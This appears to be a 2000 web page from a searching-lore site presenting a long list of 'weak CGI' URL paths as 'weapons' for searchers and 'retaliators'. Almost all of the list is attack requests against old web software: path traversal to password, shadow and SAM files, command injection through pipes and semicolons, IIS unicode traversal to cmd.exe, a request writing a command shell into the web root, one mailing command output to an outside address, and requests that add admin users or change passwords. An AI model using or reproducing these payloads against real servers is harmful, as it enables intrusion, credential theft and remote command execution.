Rudi Carell's very powerful "weak CGIs" list
(December 2000)

Courtesy of www.searchlores.org
Incorrectly used CGI scripts expose the systems hosting them to many vulnerabilities.
Rudi Carell [you may contact Rudi @ rudicarellALT+64hotmail(point)com] has listed quite a lot of -ahem-
interesting WEAK CGIs... a treasure-chest of interesting weapons for searchers and "retaliators" alike.

/test.php3
/cgi-bin/test.php3
/cgi-bin/cgiemail/uargg.txt
/cgi-bin/web2mail.cgi
/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/hosts
/random_banner/index.cgi?image_list=alternative_image.list&html_file=|ls%20-la|
/example.jsp../
/example%2ejsp
/example.jsp..
/index.jsp..
/test.jsp..
/example.jsp%81
/index.JSP
/index.jsp../
/test.jsp../
/index%2ejsp
/test%2ejsp
/index.JHTML
/*.jhtml/
/*.jsp/
/ConsoleHelp/
/*.shtml/
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html=
/cgi-bin/maillist.cgi?cmd=list&fldrname=inbox&fldnum=1&order=2&searchkey=&search_fldnum=0&page=99999&html=
/cgi-bin/userreg.cgi?cmd=insert&lang=eng&tnum=3&fld1=test999%0als
/..\..\..\winnt\repair\sam._
:80/../../../autoexec.bat
/......autoexec.bat
/.html/............/autoexec.bat
/../../../../../../../boot.ini
/....../
/..../
/inc/
/include/
/iisadmpwd/
/iissamples/
/scripts/iisadmin/ism.dll%3fhttp/dir
/iisadmin/ism.dll%3fhttp/dir
/cgi-bin/htimage.exe
/_vti_bin/fpcount.exe
/global.asa
/global.asa+.htr
/global.asa\
/default.asp+.htr
/main.asp+.htr
/_vti_bin/shtml.dll/tstt.htm
/_vti_inf.html
/_vti_log/author.log
/_vti_pvt
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_private/form_results.txt
/secret/index.html
/secret/index.htm
/cgi-bin/phf
/cgi-bin/commander.pl
/cgi-bin/Count.cgi
/cgi-bin/test.pl
/cgi-bin/printenv
/cgi-bin/test.cgi
/cgi-bin/test-cgi
/cgi-bin/nph-test-cgi
/cgi-bin/php.cgi
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript
/cgi-bin/pfdisplay
/cgi-bin/perl.exe
/cgi-bin/perl
/perl
/scripts/perl.exe
/wwwboard/wwwboard.pl
/cgi-bin/wwwboard.pl
/wwwboard/wwwadmin.pl
/cgi-bin/wwwadmin.pl
/wwwboard/wwwadmin.cgi
/cgi-bin/wwwadmin.cgi
/cgi-bin/jj
/cgi-bin/fi
/cgi-bin/finger
/cgi-bin/finger.cgi?action=archives&cmd=specific&&filename=99.10.28.15.23.username.|/bin/ls|
/cgi-bin/wais.pl
/cgi-bin/edit.pl
/cgi-bin/textcounter.pl
/cgi-bin/info2www
/cgi-bin/cachemgr.cgi
/cgi-bin/wguest.exe
/scripts/wguest.exe
/cgi-bin/test.exe
/scripts/test.exe
/cgi-bin/test.bat
/scripts/test.bat
/cgi-bin/www-sql
/cgi-bin/search.cgi%3fletter=
/cgi-bin/campas
/cgi-bin/view-source
/cgi-bin/webgais
/cgi-bin/aglimpse
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/AnyForm2
/cgi-bin/infogate
/search97/s97_cgi.exe
/search97/search97.vts
/cgi-bin/dumpenv.pl
/session/adminlogin?RCpage=/sysadmin/index.stm
/cgi-bin
/cgi-shl
/scripts
/scripts/bdir.htr
/scripts/convert.bas
/scripts/files.pl
/cgi-bin/files.pl
/domcfg.nsf/%3fopen
/domcfg.nsf/URLRedirect/%3fOpenForm
/domcfg.nsf/viewname%3fSearchView&Query="*"
/log.nsf
/domlog.nsf
/names.nsf
/catalog.nsf
/database.nsf?EditDocument
/names.nsf/Open
/cgi-bin/unlg1.1
/cgi-bin/man.sh
/cgi-bin/AT-admin.cgi
/cgi-bin/filemail.pl
/cgi-bin/mailform.pl
/cgi-bin/mailto.cgi
/cgi-bin/mailform.cgi
/cgi-bin/maillist.pl
/cgi-bin/formto.pl
/cgi-bin/bnbform.cgi
/cgi-bin/bnbform.pl
/cgi-bin/bnbform
/cgi-bin/survey.cgi
/htbin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/hosts
/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=|ls|
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/environ.cgi
/cgi-bin/environ.pl
/cgi-dos/args.bat
/cgi-bin/carbo.dll
/cgi-bin/fpexplore.exe
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:\boot.ini
/cfdocs/exampleapp/publish/admin/addcontent.cfm
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
/cfdocs/snippets/evaluate.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/viewexample.cfm?Tagname=
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/snippets/setlocale.cfm
/cgi-bin/whois_raw.cgi
/mall_log_files/order.log
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/quikstore.cfg
/orders/mountain.cfg
/orders/orders.txt
/Admin_files/order.log
/cgi-bin/query%3f
:9000/cgi-bin/query%3f
/cgi-bin/admin.cgi
/cgi-bin/ppdscgi.exe
/ppwb/Temp/
:8010/c://
:8010/d://
:8010//
:8010/..../
:8010/
:5000/
:2301
:3128/../../../../
:9090
:901
:8383
:800/../..\
:800/C:/
/adsamples/config/site.csc
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/AdvWorks/equipment/catalog_type.asp
/scripts/repost.asp
/SPSamp/AdvWorks/equipment/catalog_type.asp
/cgi-bin/rwwwshell.pl
/~root
/cgi-bin/imagemap.exe
/../../../../config.sys
/cgi-bin/foo.cmd?xxx&dir
/scripts/foo.cmd?xxx&dir
/cgi-dos/foo.cmd?xxx&dir
/cgi-bin/script.bat%3f&dir
/scripts/script.cmd%3f&dir
/scripts/script.bat%3f&dir
/cgi-bin/tst.bat
/cgi-bin/tst2.bat
/cgi-bin/test.bat
/cgi-bin/input.bat
/cgi-bin/input2.bat
/ssi/envout.bat
/cgi-bin/get32.exe
/cgi-bin/tst.bat
/cgi-bin/alibaba.pl
/cgi-bin/post32.exe
/cgi-bin/post16.exe
/cgi-bin/get16.exe
/cgi-bin/lsin.exe
/cgi-bin/lsindex2.bat
/cgi-bin/imapcern.exe
/cgi-bin/imapncsa.exe
/cgi-bin/aliredir.exe
:8080/../../../conf/Eserv.ini
:3128/../../../conf/Eserv.ini
:801/../../../../../../../../etc/hosts
:8888/
:9998/
/publisher/
/bigconf.cgi
/cgi-bin/bigconf.cgi
/scripts/bigconf.cgi
/cgi-bin/ftpdiag.cgi
/cgi-bin/formhandler.cgi
/cgi-bin/add_ftp.cgi
/cgi-bin/OrderForm.cgi
/cgi-bin/cgitest.exe
/cgi-bin/flexform.cgi
/ows-bin/owa/owa%5futil%2esignature
/ows-bin/owa/owa%5futil%2eshowsource
/ows-bin/perlidlc.bat?&dir
/ows-bin/*.bat?&dir
:8003/Display
/cgi-bin/whois.cgi
/minivend/catalog.cfg
/cgi-bin/simple
/cgi-bin/simple/config/menu
/cgi-bin/simple/config/seefile.html?mv_arg=catalog%2ecfg
/cgi-bin/simple/view_page.html?mv_arg=|/bin/ls|
/search%3f
/suche%3f
/search/iaquery.exe%3f
/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
/cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index
/cgi-bin/webwho.pl
/cgi-bin/w3-msql/index.html
/cgi-bin/FormMail.pl
/cgi-bin/formmail.pl
/msadc/msadcs.dll
/msadc/samples/adctest.asp
/scripts/tools/getdrvrs.exe
/scripts/tools/newdsn.exe%3fdriver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Web%20SQL&dbq=c:\web.mdb&newdb=CREATE_DB&attr=
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/cgi-bin/forum.pl
/cgi-bin/forum-admin.pl
/cgi-bin/sendmail.cgi
/cgi-bin/guestadd.pl
/cgi-bin/plusmail
/manage/cgi/cgiproc?Nocfile=
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=&CiRestriction=none&CiHiliteType=Full
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full
/iishelp/iis/misc/iirturnh.htw
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
/cgi-bin/wwwthreads/changedisplay.pl
/scripts/wsisa.dll/WService=anything?WSMadmin
/cgi-bin/Ultimate.cgi
/cgi-bin/forumdisplay.cgi
/ubb/cgi-bin/postings.cgi
/cgi-bin/postings.cgi
/cgi-bin/core
/.htaccess
/.htpasswd
/cgi-bin/echo.bat
/cgi-bin/hello.bat
/cgi-bin/htsearch?exclude=%60%60
/cgibin/htgrep/file=index.html&hdr=/etc/hosts
/cgi-bin/loadpage.cgi
/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
/cgi-bin/rmp_query
/cgi-bin/postcard.pl
/cgi-bin/.fhp
/cgi-bin/clickresponder.pl
/cgi-win/uploader.exe
/cgi-bin/uploadn.asp
/cgi-bin/excite
/cgi-bin/sojourn.cgi?cat=ng%00
/cgi-bin/abuse.man?file=&domain=&script=
/jsp/source.jsp
/cgi-bin/dfire.cgi
/cd/../config/html/cnf_gi.htm
/cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts
/ccbill/
/cgi-bin/windmail.exe?-n%20c:\boot.ini%20swoopme@@hotmail.com
/cgi-bin/windmail.exe?%20|%20dir%20c:\
/cgi-bin/dcforum/install_help.cgi
/doc/
/scripts/slxweb.dll/admin
/cgi-bin/getdoc.cgi
/cgi-bin/webplus?script=
/cgi-bin/scripts/cart.pl
/cgi-bin/scripts/cart.pl?vars
/cgi-bin/scripts/cart.pl?env
/cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items
/cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbname=;ls|mail%20swoopme@@hotmail.com|&f6=^a.*&action=searchdbdisplay
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/_vti_aut/mtd2lv.dll
/piranha/secure/passwd.php3?username=piranha&passwd=q
/cgi-bin/UltraBoard/UltraBoard.pl?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/cgi-bin/UltraBoard/UltraBoard.cgi?Action=PrintableTopic&Post=../../UBData/Members/members.grp%00&Board=6210&Idle=10&Sort=0&Order=Descend&Page=0&Session=
/scripts/cart32.exe/cart32clientlist?passwd=wemilo
/scripts/c32web.exe/ChangeAdminPassword
/cgi-bin/cart32.exe/expdate
/scripts/dbman/db.cgi?db=tedb
/scripts/process_bug.cgi
/cgi-bin/process_bug.cgi
/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
/scripts/emurl/RECMAN.dll?
/cgi-bin/allmanage.pl
/cgi-bin/allmanage.cgi
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/ads.cgi
/cgi-bin/admin.cgi
/ads/admin.cgi
/cgi-bin/adpassword.txt
/ads/adpassword.txt
/cgi-bin/infosrch.cgi
/scripts/Carello/add.exe
:8000/cgi/wja?page=wja
/robots.txt
/file/index.jsp
/file/main.jsp
/file/main.shtml
/file/index.shtml
/file/main.jhtml
/file/index.jhtml
/cgi-bin/showfile
/servlet/SessionServlet
/servlet/viewsource.jsp
/viewsource.jsp
:8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/hosts%00
/cgi-bin/pollit/Poll_It_v2.0.cgi?data_dir=/etc/hosts%00
/site/eg/source.asp
/eg/source.asp
/cgi-bin/source.asp
/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts
/cgi-bin/msn.cgi
/cgi-bin/disk2server.cgi
/cgi-bin/upload.cgi
/.www.my.cnf
/cgi-bin/.www.my.cnf
/cgi-bin/futureforum.cgi
/examples/applications/bboard/bboard_frames.html
/admin-serv/config/admpw
/https-admserv/config/admpw
/cgi-bin/cookmail
/cgi-bin/cookmail/cookmail
/cgi-bin/cookmail/cookmail.exe
/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc
/active.log
/cgi/cvsweb.cgi
/cgi-bin/cvsweb.cgi
:8010/Guide/../../../../../../../../../../../../../../../etc/shadow
:8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings
/bin/common/user_update_admin.pl
/bin/common/user_update_passwd.pl?user_id=V&firstname=FI&lastname=LA&course_id=SID&password1=NEWPWD&password2=NEWPWD
/cgi-bin/ssi//../../../../../../../../../etc/hosts
:8080/examples/jsp/snp/anything.snp
:8080/anything.jsp
/anything.jsp
/examples/jsp/snp/anything.snp
/pservlet.html
/cgi-bin/[email protected]&text=tst&EmailForm=/cgi-bin/mailto
/cgi-bin/[email protected]&FileName=mailfile:[email protected]
/cgi-bin/[email protected]&filename=mailfile.cgi
/cgi-bin/[email protected][email protected]&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/cgi-bin/af.cgi
/%00/
/admin/
:8080/tea/dynamic/system/teaservlet/Admin?admin=true
/servlet/file
/%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log
/servlet/test/pathInfo/test
/..../
/~nobody/etc/
:3000/../../hosts
:444/..\..\..\..\..\autoexec.bat
/pccsmysqladm/incs/dbconnect.inc
/include/dbconfig.inc
:8888/ab2/@Ab2Admin
:8888/cgi-bin/admin/admin
:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe
/cgi-bin/netauth.cgi?cmd=show&page=../../
/admin.php3?admin=whatever
:9090/board.html
:9090/examples/applications/bboard/bboard_frames.html
:9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
/cgibin/amadmin.pl?setpasswd
/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini
/cgi-bin/news/news.cgi?addAuthor
/cgi-bin/awl/auctionweaver.pl
/cgi-bin/CGImail.exe
/.photon/voyager/config.full
/cgi-bin/cpmdaemon.cgi
:8088
/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/
/phpPhotoAlbum/getalbum.php?album=../../../etc/
/cgi-bin-sdb/
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/hosts%00
/siteman000510/siteman.php3
/cgi-bin/multihtml.pl?multi=/etc/hosts%00html
/search.dll?search?query=%00&logic=AND
m/search.dll?search?query=/&logic=AND
:8002/Newuser?Image=../../database/rbsserv.mdb
/doc/packages/
/cp/rac/nsManager.cgi?Domain=nothing.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm
/_private/shopping_cart.mdb
/cgi-bin/webdata_test.pl
/cgi-bin/cached_feed.cgi?../../../.+/etc/hosts
/cgi-bin/ssi/cgi-bin/ssi
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../etc
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
/cgi-bin/Web_Store/web_store.cgi?page=%00
/cgi-bin/phpinfo.php
/cgi-bin/phpinfo.php3
:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
:8000/servlet/ssifilter/../../test.jsp
:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
:8000/servlet/jsp/../../tst.txt
:8100//WEB-INF/
:8100//WEB-INF/web.xml
:8100//WEB-INF/webapp.properties
/c/s.dll/pagelog.cgi?display=../../../../tmp/a
/cgi-bin/pagelog.cgi?name=../../../../../tmp/blah
/cgi-bin/gbook.cgi?_MAILTO=xx;ls
/cgi-bin/search.pl
/admin/includes/
/cgi-bin/bb-hist.sh?HISTFILE=/home/*
/cgi-bin/bb-histlog.sh
/cgi-bin/bb-hostsvc.sh
/cgi-bin/bb-rep.sh
/cgi-bin/bb-replog.sh
/cgi-bin/bb-ack.sh
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
/cgi-bin/build.cgi
/build.cgi
/forums/list.php
/cgi-bin/html_page?TEMPLATE=main
/index.php3?vhosts=http://go.to
/cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host=&last_page=db2www0022.html&fn=db2www.html
/+/
/./
/+./
/++/
/++./
/includes/global.inc
/2600-cgi/ezmlm-cgi
/cgi-bin/ezmlm-cgi
/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20"Content-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00
/."./."./Perl/eg/core/findtar
/."./."./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\InetPub\wwwroot\cmd.pl+&+.pl
/."./."./winnt/reapir/sam._%20.pl
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts
/ad.cgi?file=../../../../../../../../etc/hosts
/subscribe.pl
/cgi-bin/simplestmail.cgi?redirect=www.ibm.com&MyEmail=swoopme@hotmail.com;ls%20-alsi&submit=run
/everythingform.cgi?config=../../../../../../../../bin/[email protected]
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/[email protected]
/cgi-bin/dcguest.cgi
/cgi-bin/dcguest/dcguest.cgi
/guestbook/dcguest.cgi
/index.php3.%5c../..%5cconf/httpd.conf
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/submit.php

Good luck, good hunt!

(c) 2000: [fravia+], all rights reserved